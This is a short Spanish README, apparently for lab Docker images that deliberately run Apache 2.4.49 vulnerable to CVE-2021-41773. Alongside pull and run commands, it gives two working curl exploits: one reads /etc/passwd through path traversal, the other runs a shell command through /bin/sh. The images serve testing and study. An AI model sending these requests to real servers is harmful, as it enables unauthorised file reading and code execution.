
Imágenes de Docker vulnerables para CVE-2021-41773
Esta vulnerabilidad solo aplica a la versión 2.4.49 que tiene configuraciones específicas no predeterminadas. En ciertas situaciones, esto puede resultar en lectura de archivos o ejecución de código.
https://twitter.com/ptswarm/status/1445376079548624899
Los contenedores se pueden extraer directamente de Docker Hub usando
docker pull blueteamsteve/cve-2021-41773:no-cgid
y ejecutarlos usando
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Los registros de Apache se pueden ver usando lo siguiente, o simplemente excluir "-dit" del comando de ejecución anterior para transmitir stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Los contenedores se pueden extraer directamente de Docker Hub usando
docker pull blueteamsteve/cve-2021-41773:with-cgid
y ejecutarlos usando
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Los registros de Apache se pueden ver usando lo siguiente, o simplemente excluir "-dit" del comando de ejecución anterior para transmitir stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Modifique y construya sus propias versiones usando el dockerfile y los archivos de plantilla httpd.conf en los subdirectorios